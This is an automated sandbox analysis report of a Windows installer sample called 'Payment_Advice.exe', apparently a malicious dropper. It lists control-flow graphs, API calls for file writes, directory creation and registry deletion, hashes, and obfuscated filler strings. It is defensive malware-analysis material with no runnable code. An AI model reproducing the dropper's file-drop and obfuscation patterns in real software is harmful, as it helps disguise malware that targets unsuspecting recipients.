                                                  control_flow_graph 538 401752-401777 call 402b38 call 4059aa 543 401781-401793 call 405ee8 call 405933 lstrcatW 538->543 544 401779-40177f call 405ee8 538->544 549 401798-401799 call 40617c 543->549 544->549 553 40179e-4017a2 549->553 554 4017a4-4017ae call 40622b 553->554 555 4017d5-4017d8 553->555 562 4017c0-4017d2 554->562 563 4017b0-4017be CompareFileTime 554->563 556 4017e0-4017fc call 405b54 555->556 557 4017da-4017db call 405b2f 555->557 565 401870-401899 call 405192 call 403060 556->565 566 4017fe-401801 556->566 557->556 562->555 563->562 578 4018a1-4018ad SetFileTime 565->578 579 40189b-40189f 565->579 567 401852-40185c call 405192 566->567 568 401803-401841 call 405ee8 * 2 call 405f0a call 405ee8 call 4056c4 566->568 580 401865-40186b 567->580 568->553 600 401847-401848 568->600 582 4018b3-4018be FindCloseChangeNotification 578->582 579->578 579->582 583 4029ce 580->583 585 4018c4-4018c7 582->585 586 4029c5-4029c8 582->586 587 4029d0-4029d4 583->587 590 4018c9-4018da call 405f0a lstrcatW 585->590 591 4018dc-4018df call 405f0a 585->591 586->583 597 4018e4-402241 call 4056c4 590->597 591->597 597->586 597->587 600->580 602 40184a-40184b 600->602 602->567
                                                  APIs
                                                  • lstrcatW.KERNEL32(00000000,00000000), ref: 00401793
                                                  • CompareFileTime.KERNEL32(-00000014,?,"C:\Users\user\AppData\Local\Temp\selvfinansieringers\Pinaceae.mac","C:\Users\user\AppData\Local\Temp\selvfinansieringers\Pinaceae.mac",00000000,00000000,"C:\Users\user\AppData\Local\Temp\selvfinansieringers\Pinaceae.mac",C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Whereas,?,?,00000031), ref: 004017B8
                                                    • Part of subcall function 00405EE8: lstrcpynW.KERNEL32(?,?,00000400,004033C6,004281E0,NSIS Error), ref: 00405EF5
                                                    • Part of subcall function 00405192: lstrlenW.KERNEL32(Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000,?), ref: 004051CA
                                                    • Part of subcall function 00405192: lstrlenW.KERNEL32(00402D92,Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000), ref: 004051DA
                                                    • Part of subcall function 00405192: lstrcatW.KERNEL32(Completed,00402D92), ref: 004051ED
                                                    • Part of subcall function 00405192: SetWindowTextW.USER32(Completed,Completed), ref: 004051FF
                                                    • Part of subcall function 00405192: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405225
                                                    • Part of subcall function 00405192: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040523F
                                                    • Part of subcall function 00405192: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2070469428.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2070450972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070487189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070779494.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Payment_Advice.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                  • String ID: "C:\Users\user\AppData\Local\Temp\selvfinansieringers\Pinaceae.mac"$C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Whereas$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Strategiplan\stammede.lor
                                                  • API String ID: 1941528284-1422505914
                                                  • Opcode ID: 684cf647b502b8cea27ec51f3a74b93e11290c925dea9a009321a0283d18598e
                                                  • Instruction ID: 10c9bfb48ac22d70b7a6fd4bf6847715cc6e5200bae8767ad0241ecc3b8f07ee
                                                  • Opcode Fuzzy Hash: 684cf647b502b8cea27ec51f3a74b93e11290c925dea9a009321a0283d18598e
                                                  • Instruction Fuzzy Hash: 6841B172904519BACF10BBB5CC86DAF7679EF05329F20463BF521B11E1D63C8A41CA6E

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 604 405192-4051a7 605 4051ad-4051be 604->605 606 40525e-405262 604->606 607 4051c0-4051c4 call 405f0a 605->607 608 4051c9-4051d5 lstrlenW 605->608 607->608 610 4051f2-4051f6 608->610 611 4051d7-4051e7 lstrlenW 608->611 613 405205-405209 610->613 614 4051f8-4051ff SetWindowTextW 610->614 611->606 612 4051e9-4051ed lstrcatW 611->612 612->610 615 40520b-40524d SendMessageW * 3 613->615 616 40524f-405251 613->616 614->613 615->616 616->606 617 405253-405256 616->617 617->606
                                                  APIs
                                                  • lstrlenW.KERNEL32(Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000,?), ref: 004051CA
                                                  • lstrlenW.KERNEL32(00402D92,Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D92,00000000), ref: 004051DA
                                                  • lstrcatW.KERNEL32(Completed,00402D92), ref: 004051ED
                                                  • SetWindowTextW.USER32(Completed,Completed), ref: 004051FF
                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405225
                                                  • SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040523F
                                                  • SendMessageW.USER32(?,00001013,?,00000000), ref: 0040524D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2070469428.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2070450972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070487189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070779494.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Payment_Advice.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                  • String ID: Completed
                                                  • API String ID: 2531174081-3087654605
                                                  • Opcode ID: 48b19a34b63cb90607c45f1125da49094336e2c299eab4fbc02cedcd7faf0acf
                                                  • Instruction ID: 4e820289f32981fa80bdc57a8535783694e00142cb9a6ac2a8905b2d060becfb
                                                  • Opcode Fuzzy Hash: 48b19a34b63cb90607c45f1125da49094336e2c299eab4fbc02cedcd7faf0acf
                                                  • Instruction Fuzzy Hash: 9D219D31D00518BACB21AF95DD84ADFBFB8EF44350F14807AF904B62A0C7794A41DFA8

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 618 40317b-4031a4 GetTickCount 619 4032e5-4032ed call 402d18 618->619 620 4031aa-4031d5 call 40330d SetFilePointer 618->620 625 4032ef-4032f4 619->625 626 4031da-4031ec 620->626 627 4031f0-4031fe call 4032f7 626->627 628 4031ee 626->628 631 403204-403210 627->631 632 4032d7-4032da 627->632 628->627 633 403216-40321c 631->633 632->625 634 403247-403263 call 40638e 633->634 635 40321e-403224 633->635 640 4032e0 634->640 641 403265-40326d 634->641 635->634 637 403226-403246 call 402d18 635->637 637->634 645 4032e2-4032e3 640->645 643 4032a1-4032a7 641->643 644 40326f-403285 WriteFile 641->644 643->640 648 4032a9-4032ab 643->648 646 403287-40328b 644->646 647 4032dc-4032de 644->647 645->625 646->647 649 40328d-403299 646->649 647->645 648->640 650 4032ad-4032c0 648->650 649->633 651 40329f 649->651 650->626 652 4032c6-4032d5 SetFilePointer 650->652 651->650 652->619
                                                  APIs
                                                  • GetTickCount.KERNEL32 ref: 00403190
                                                    • Part of subcall function 0040330D: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FE5,?), ref: 0040331B
                                                  • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,?,00403093,00000004,00000000,00000000,?,?,?,0040300C,000000FF,00000000,00000000), ref: 004031C3
                                                  • WriteFile.KERNELBASE(0040BE78,00410BAF,00000000,00000000,habitatal missmark vigourlesses macroscelides.ujvnes territoried evildoing,applaudably affotograferingers fiberpennenes handelsskolerne yard fritidssyssels.mollitude geigy ciliiform quiveringblob amating tilvejebringes cranioclasty,fuglekonges substantious dek,00004000,?,00000000,?,00403093,00000004,00000000,00000000,?,?), ref: 0040327D
                                                  • SetFilePointer.KERNELBASE(00137242,00000000,00000000,habitatal missmark vigourlesses macroscelides.ujvnes territoried evildoing,applaudably affotograferingers fiberpennenes handelsskolerne yard fritidssyssels.mollitude geigy ciliiform quiveringblob amating tilvejebringes cranioclasty,fuglekonges substantious dek,00004000,?,00000000,?,00403093,00000004,00000000,00000000,?,?,?,0040300C), ref: 004032CF
                                                  Strings
                                                  • &, xrefs: 004031DA
                                                  • habitatal missmark vigourlesses macroscelides.ujvnes territoried evildoing,applaudably affotograferingers fiberpennenes handelsskolerne yard fritidssyssels.mollitude geigy ciliiform quiveringblob amating tilvejebringes cranioclasty,fuglekonges substantious dek, xrefs: 004031F0, 004031F6
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2070469428.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2070450972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070487189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070779494.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Payment_Advice.jbxd
                                                  Similarity
                                                  • API ID: File$Pointer$CountTickWrite
                                                  • String ID: habitatal missmark vigourlesses macroscelides.ujvnes territoried evildoing,applaudably affotograferingers fiberpennenes handelsskolerne yard fritidssyssels.mollitude geigy ciliiform quiveringblob amating tilvejebringes cranioclasty,fuglekonges substantious dek$&
                                                  • API String ID: 2146148272-413442094
                                                  • Opcode ID: c3e212118fbef9e4adb068f61efe2bd575096358676594393449bc7ea11798d5
                                                  • Instruction ID: 37036d35f8974e55ed68100cf34a45723990335e8d7a2adc0945050858e8c70a
                                                  • Opcode Fuzzy Hash: c3e212118fbef9e4adb068f61efe2bd575096358676594393449bc7ea11798d5
                                                  • Instruction Fuzzy Hash: 7D41CB725042019FDB10DF29ED848A63BACFB54356720827FE910B22E1D7B99D41DBED

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 653 4015b9-4015cd call 402b38 call 4059de 658 401614-401617 653->658 659 4015cf-4015eb call 405960 CreateDirectoryW 653->659 660 401646-402195 call 401423 658->660 661 401619-401638 call 401423 call 405ee8 SetCurrentDirectoryW 658->661 668 40160a-401612 659->668 669 4015ed-4015f8 GetLastError 659->669 674 4029c5-4029d4 660->674 661->674 677 40163e-401641 661->677 668->658 668->659 670 401607 669->670 671 4015fa-401605 GetFileAttributesW 669->671 670->668 671->668 671->670 677->674
                                                  APIs
                                                    • Part of subcall function 004059DE: CharNextW.USER32(?,?,00424ED8,?,00405A52,00424ED8,00424ED8,?,?,75922EE0,00405790,?,C:\Users\user\AppData\Local\Temp\,75922EE0,"C:\Users\user\Desktop\Payment_Advice.exe"), ref: 004059EC
                                                    • Part of subcall function 004059DE: CharNextW.USER32(00000000), ref: 004059F1
                                                    • Part of subcall function 004059DE: CharNextW.USER32(00000000), ref: 00405A09
                                                  • CreateDirectoryW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 004015E3
                                                  • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015ED
                                                  • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 004015FD
                                                  • SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Whereas,?,00000000,000000F0), ref: 00401630
                                                  Strings
                                                  • C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Whereas, xrefs: 00401623
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2070469428.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2070450972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070487189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070779494.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Payment_Advice.jbxd
                                                  Similarity
                                                  • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                                  • String ID: C:\Users\user\AppData\Local\Temp\forgrovelse\konstituerendes\Whereas
                                                  • API String ID: 3751793516-2435848561
                                                  • Opcode ID: 77a50746faaf70f481261059f09a464f58bc4f4b68c75f239c42b854978f3346
                                                  • Instruction ID: 199c01fa1d361ac50fd0ab4436582695df459e1bfde9dc24052da25e00d2fbae
                                                  • Opcode Fuzzy Hash: 77a50746faaf70f481261059f09a464f58bc4f4b68c75f239c42b854978f3346
                                                  • Instruction Fuzzy Hash: D011C271908104EBDB206FA0CD449AF36B0EF15365B64063BF881B62E1D63D49819A6E

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 679 40638e-4063b1 680 4063b3-4063b6 679->680 681 4063bb-4063be 679->681 682 406ddb-406ddf 680->682 683 4063c1-4063ca 681->683 684 4063d0 683->684 685 406dd8 683->685 686 4063d7-4063db 684->686 687 406517-406bbe 684->687 688 40647c-406480 684->688 689 4064ec-4064f0 684->689 685->682 695 4063e1-4063ee 686->695 696 406dc3-406dd6 686->696 698 406bc0-406bd6 687->698 699 406bd8-406bee 687->699 693 406486-40649f 688->693 694 406d2c-406d36 688->694 690 4064f6-40650a 689->690 691 406d3b-406d45 689->691 697 40650d-406515 690->697 691->696 700 4064a2-4064a6 693->700 694->696 695->685 701 4063f4-40643a 695->701 696->682 697->687 697->689 704 406bf1-406bf8 698->704 699->704 700->688 705 4064a8-4064ae 700->705 702 406462-406464 701->702 703 40643c-406440 701->703 708 406472-40647a 702->708 709 406466-406470 702->709 706 406442-406445 GlobalFree 703->706 707 40644b-406459 GlobalAlloc 703->707 710 406bfa-406bfe 704->710 711 406c1f-406c2b 704->711 712 4064b0-4064b7 705->712 713 4064d8-4064ea 705->713 706->707 707->685 714 40645f 707->714 708->700 709->708 709->709 715 406c04-406c1c 710->715 716 406dad-406db7 710->716 711->683 718 4064c2-4064d2 GlobalAlloc 712->718 719 4064b9-4064bc GlobalFree 712->719 713->697 714->702 715->711 716->696 718->685 718->713 719->718
                                                  Strings
                                                  • habitatal missmark vigourlesses macroscelides.ujvnes territoried evildoing,applaudably affotograferingers fiberpennenes handelsskolerne yard fritidssyssels.mollitude geigy ciliiform quiveringblob amating tilvejebringes cranioclasty,fuglekonges substantious dek, xrefs: 00406398
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2070469428.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2070450972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070487189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070779494.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Payment_Advice.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: habitatal missmark vigourlesses macroscelides.ujvnes territoried evildoing,applaudably affotograferingers fiberpennenes handelsskolerne yard fritidssyssels.mollitude geigy ciliiform quiveringblob amating tilvejebringes cranioclasty,fuglekonges substantious dek
                                                  • API String ID: 0-2559241417
                                                  • Opcode ID: 6405766d724d27084044e37e785a1f94a30cbcf56bd7ff567fed44530e351a1e
                                                  • Instruction ID: 37bedb047a1cdcb2186193905b10d92141f0d7a21aac59a3988bc0e8c58e701c
                                                  • Opcode Fuzzy Hash: 6405766d724d27084044e37e785a1f94a30cbcf56bd7ff567fed44530e351a1e
                                                  • Instruction Fuzzy Hash: 8A816671E04228DBDF24CFA8C844BADBBB0FF44305F12816AD856BB281C7785A96DF44

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 720 402b78-402ba1 RegOpenKeyExW 721 402ba3-402bae 720->721 722 402c0c-402c10 720->722 723 402bc9-402bd9 RegEnumKeyW 721->723 724 402bb0-402bb3 723->724 725 402bdb-402bed RegCloseKey call 406252 723->725 727 402c00-402c03 RegCloseKey 724->727 728 402bb5-402bc7 call 402b78 724->728 732 402c13-402c19 725->732 733 402bef-402bfe 725->733 730 402c09-402c0b 727->730 728->723 728->725 730->722 732->730 735 402c1b-402c29 RegDeleteKeyW 732->735 733->722 735->730 737 402c2b 735->737 737->722
                                                  APIs
                                                  • RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?), ref: 00402B99
                                                  • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402BD5
                                                  • RegCloseKey.ADVAPI32(?), ref: 00402BDE
                                                  • RegCloseKey.ADVAPI32(?), ref: 00402C03
                                                  • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402C21
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2070469428.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2070450972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070487189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070779494.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Payment_Advice.jbxd
                                                  Similarity
                                                  • API ID: Close$DeleteEnumOpen
                                                  • String ID:
                                                  • API String ID: 1912718029-0
                                                  • Opcode ID: 5dde48613cb83d0adfaafee1501ae70c9f94bc296712e9edd69c2eafcb4792e1
                                                  • Instruction ID: 9ec10266fc8442ca9feb2f2c36393197ef7fd7660a084b6a818e704b420db749
                                                  • Opcode Fuzzy Hash: 5dde48613cb83d0adfaafee1501ae70c9f94bc296712e9edd69c2eafcb4792e1
                                                  • Instruction Fuzzy Hash: 0D113A7190410CFEEF11AF90DE89EAE3B79EB44348F10057AFA05A10E0D3B59E51AA69

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 738 403060-40306e 739 403070-403086 SetFilePointer 738->739 740 40308c-403095 call 40317b 738->740 739->740 743 403175-403178 740->743 744 40309b-4030ae call 405bd7 740->744 747 403161 744->747 748 4030b4-4030c8 call 40317b 744->748 750 403163-403164 747->750 748->743 752 4030ce-4030d1 748->752 750->743 753 4030d3-4030d6 752->753 754 40313d-403143 752->754 757 403172 753->757 758 4030dc 753->758 755 403145 754->755 756 403148-40315f ReadFile 754->756 755->756 756->747 759 403166-40316f 756->759 757->743 760 4030e1-4030eb 758->760 759->757 761 4030f2-403104 call 405bd7 760->761 762 4030ed 760->762 761->747 765 403106-40311b WriteFile 761->765 762->761 766 403139-40313b 765->766 767 40311d-403120 765->767 766->750 767->766 768 403122-403135 767->768 768->760 769 403137 768->769 769->757
                                                  APIs
                                                  • SetFilePointer.KERNELBASE(00409230,00000000,00000000,00000000,00000000,?,?,?,0040300C,000000FF,00000000,00000000,00409230,?), ref: 00403086
                                                  • WriteFile.KERNELBASE(00000000,habitatal missmark vigourlesses macroscelides.ujvnes territoried evildoing,applaudably affotograferingers fiberpennenes handelsskolerne yard fritidssyssels.mollitude geigy ciliiform quiveringblob amating tilvejebringes cranioclasty,fuglekonges substantious dek,?,000000FF,00000000,habitatal missmark vigourlesses macroscelides.ujvnes territoried evildoing,applaudably affotograferingers fiberpennenes handelsskolerne yard fritidssyssels.mollitude geigy ciliiform quiveringblob amating tilvejebringes cranioclasty,fuglekonges substantious dek,00004000,00409230,00409230,00000004,00000004,00000000,00000000,?,?), ref: 00403113
                                                  Strings
                                                  • habitatal missmark vigourlesses macroscelides.ujvnes territoried evildoing,applaudably affotograferingers fiberpennenes handelsskolerne yard fritidssyssels.mollitude geigy ciliiform quiveringblob amating tilvejebringes cranioclasty,fuglekonges substantious dek, xrefs: 004030DC, 004030F3, 0040310F
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2070469428.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.2070450972.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070487189.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.000000000042E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000444000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070512480.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.2070779494.0000000000448000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_Payment_Advice.jbxd
                                                  Similarity
                                                  • API ID: File$PointerWrite
                                                  • String ID: habitatal missmark vigourlesses macroscelides.ujvnes territoried evildoing,applaudably affotograferingers fiberpennenes handelsskolerne yard fritidssyssels.mollitude geigy ciliiform quiveringblob amating tilvejebringes cranioclasty,fuglekonges substantious dek
                                                  • API String ID: 539440098-2559241417
                                                  • Opcode ID: 73e73457c5bbcdafa96f221cdd1e093cd11c4acccee03c0e5d0162ce9b0576c4
                                                  • Instruction ID: fc2ead670903f3fcf09a518996cfd184d9dc321171b4a7c5d6e0cc79c3f8c1f9
                                                  • Opcode Fuzzy Hash: 73e73457c5bbcdafa96f221cdd1e093cd11c4acccee03c0e5d0162ce9b0576c4
                                                  • Instruction Fuzzy Hash: 8C312631504219FBDF11CF65EC44A9E3FBCEB08755F20813AF904AA1A0D3749E51DBA9

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 770 405b83-405b8f 771 405b90-405bc4 GetTickCount GetTempFileNameW 770->771 772 405bd3-405bd5 771->772 773 405bc6-405bc8 771->773 775 405bcd-405bd0 772->775 773->771 774 405bca 773->774 774->775
                                                  APIs
                                                  • GetTickCount.KERNEL32 ref: 00405BA1
                                                  • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,00403356,1033,C:\Users\user\AppData\Local\Temp\), ref: 00405BBC
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.2070469428.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
